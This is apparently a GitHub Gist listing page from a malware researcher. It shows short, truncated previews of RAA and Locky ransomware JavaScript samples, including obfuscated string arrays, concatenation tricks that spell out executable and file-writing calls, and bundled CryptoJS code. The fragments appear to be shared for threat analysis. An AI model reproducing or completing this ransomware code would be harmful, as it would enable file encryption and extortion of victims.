@Antelox Antelox
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var _0xc751 = ["length", "digits", "boolean", "slice", "isNeg", "charAt", "-", "0", "substr", "abs", "", "1", "2", "3", "4", "5", "6", "7", "8", "9", "a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z", "min", "charCodeAt", "max", "fromCharCode", " ", "join", "floor", "ceil", "modulus", "mu", "bkplus1", "modulo", "multiplyMod", "powMod", "NoPadding", "PKCS1Padding", "RawEncoding", "NumericEncoding", "number", "chunkSize", "radix", "barrett", "string", "random", "split", "substring", "lib", "Base", "prototype", "mixIn", "init", "hasOwnProperty", "apply", "$super", "extend", "toString", "WordArray", "words", "sigBytes", "stringify", "clamp", "push", "call", "clone", "enc", "Hex", "Latin1", "Utf8", "Malformed UTF-8 data", "parse", "BufferedBlockAlgorithm", "_data", "_nDataBytes", "concat", "blockSize", "_minBufferSize", "splice", "Hasher", "cfg", "reset", "finalize", "HMAC", "algo", "Base64", "_map", "indexOf", "create", "ABCDEFGHIJKLMN |
Antelox
/ RAA_ransomware_new_variant.js
Created
August 29, 2016 14:05
New RAA ransomware variant - code dropped by a .doc file
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ////1pelDZyydsTIR5Zri3YDm3hG5qDWSU0SMOml2APXT0G3P6AlpXW9crsWOlRhh8YXNSgCuSx1Zjzdgdom63F12MhHMkrdgGrdSupSnzqVGJpa5T1j1PDr4GQ52hbrBXEO2yO5MJw2yKhzKtBRVmH2XgU9eyRAdXfitQ7ClpUDz5c39YmHNDbqp6O5g0LMTlHOoISDSwxqnKSrqctz5QyK0fch83I7kym6PftqKPE2N4rWtIsjjcHQvf1C8CNCshPbHhfJ9yyRulOHyQKRDoGHtGIXhd3pp6x8K6WqADLhjj3E9TMMqEXrKSk2mBjMMyBANayM1frIWms1Hf1vx3noqPOJZ7bEd5MK4mXWrBYWc5ysmR2kzOKZWsBM35h44iAavITskbRgpPbvY8l1dRphJxYznVA8MVhij3dOJX4iFQimEvP0QyIVz4CPy0s2sQtz8sWAeZYsTOaCXwWyM6NrzG7AjDGWBA66WMlNPYbj35kH4nj8z8nKneuDfoHntevO8tebGI3T7uDeFCd3ZtBYOAFKemqomrJJO27ASNPPJIu0Vt4Cb60n4ZjmtwHy0st3X7jyoFqiwOJyhrekX9ooPdt9EiF7rAaZV4BQlhIPUuS4uiKhmzpyZlRUe9gYPBRgyTrgoNvfBJ44ITW8vQaanbri7DEajAmdnul88ghLzB4SNKFqDV1WB67GaIj989QiYcY5VvOchvCJPzZ5IJg5ijouN03foKODTD0nQdfATbxED1QlEpE2V0HwdABJaYkfTtchUEWHR7rmxXUbfEB2ICKY96TK6CbCbeRp4quRaborW9RqOIwDILqUSBHn3AYLX0IbATj415mdqAP21B217Uwq5YkQpEFuZh1kbKrYKNpTgwl30HbI6BAK5EqqHZBBdrEaLSfSGEDIYfxTqW8fmA7XtHjusZsPgM7TDcd4ghr7vEs6cqYAiV7cKSGTyuBTKJZXiOEAhq0ogNDsfoL0QeMCtqrBOoqoe1beFZ8z7cG8pDGpcfAmj64UNzXk |
Antelox
/ INV000 701.js
Created
July 23, 2016 07:38
Locky embeds its dropper in the javascript loader - base64 version
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var NIb6 = "1" + ""; | |
| var JIb = " 32" + ""; | |
| var SUt = "Run" + ""; | |
| var WFo9 = "in" + ""; | |
| var It8 = ".b" + ""; | |
| function STq(FDw){return FDw;};var Km = "xe" + ""; | |
| var HUg8 = ".e" + ""; | |
| function OFe8(UDd){return UDd;};var ZYt1 = "H" + ""; | |
| var NUl = "Hd" + ""; | |
| var DTo = "JQl13" + ""; |
Antelox
/ INV000 4f4.js
Created
July 22, 2016 17:26
Locky embeds its dropper in the javascript loader
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var Vg3 = "e" + ""; | |
| var Ab7 = "clos" + ""; | |
| function Zt4(EGk4){return EGk4;};var Du0 = "e" + ""; | |
| var Xb1 = "Fil" + ""; | |
| var ZOw = "veTo" + ""; | |
| var NCn = "Sa" + ""; | |
| function IVm2(QZd2){return QZd2;};var ZWu = "t" + ""; | |
| var RAs = "eTex" + ""; | |
| var Ix40 = "it" + ""; | |
| var Bq0 = "wr" + ""; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var CryptoJS = CryptoJS || function(u, p) { | |
| var d = {}, | |
| l = d.lib = {}, | |
| s = function() {}, | |
| t = l.Base = { | |
| extend: function(a) { | |
| s.prototype = this; | |
| var c = new s; | |
| a && c.mixIn(a); | |
| c.hasOwnProperty("init") || (c.init = function() { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var CryptoJS = CryptoJS || function(u, p) { | |
| var d = {}, | |
| l = d.lib = {}, | |
| s = function() {}, | |
| t = l.Base = { | |
| extend: function(a) { | |
| s.prototype = this; | |
| var c = new s; | |
| a && c.mixIn(a); | |
| c.hasOwnProperty("init") || (c.init = function() { |
Antelox
/ CANON000370699263413.js
Created
June 29, 2016 14:00
Locky js donwloader - More info here: http://pastebin.com/t4kPAqXP
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| relevant = []; | |
| var unlike = { ':': '.','U': 'S','1010': 'X'}; | |
| var errant = 0; | |
| function achievment(bidttt){if(bidttt==1){return 2;}else{return 17;} | |
| return 3;} | |
| function dollarm(rivulet) { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var CryptoJS = CryptoJS || function(u, p) { | |
| var d = {}, | |
| l = d.lib = {}, | |
| s = function() {}, | |
| t = l.Base = { | |
| extend: function(a) { | |
| s.prototype = this; | |
| var c = new s; | |
| a && c.mixIn(a); | |
| c.hasOwnProperty("init") || (c.init = function() { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var CryptoJS = CryptoJS || function(u, p) { | |
| var d = {}, | |
| l = d.lib = {}, | |
| s = function() {}, | |
| t = l.Base = { | |
| extend: function(a) { | |
| s.prototype = this; | |
| var c = new s; | |
| a && c.mixIn(a); | |
| c.hasOwnProperty("init") || (c.init = function() { |
Antelox
/ RAA_Ransom_beautified.js
Created
June 14, 2016 13:09
Beautified Javascript code of the RAA Ransomware
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var CryptoJS = CryptoJS || function(u, p) { | |
| var d = {}, | |
| l = d.lib = {}, | |
| s = function() {}, | |
| t = l.Base = { | |
| extend: function(a) { | |
| s.prototype = this; | |
| var c = new s; | |
| a && c.mixIn(a); | |
| c.hasOwnProperty("init") || (c.init = function() { |
NewerOlder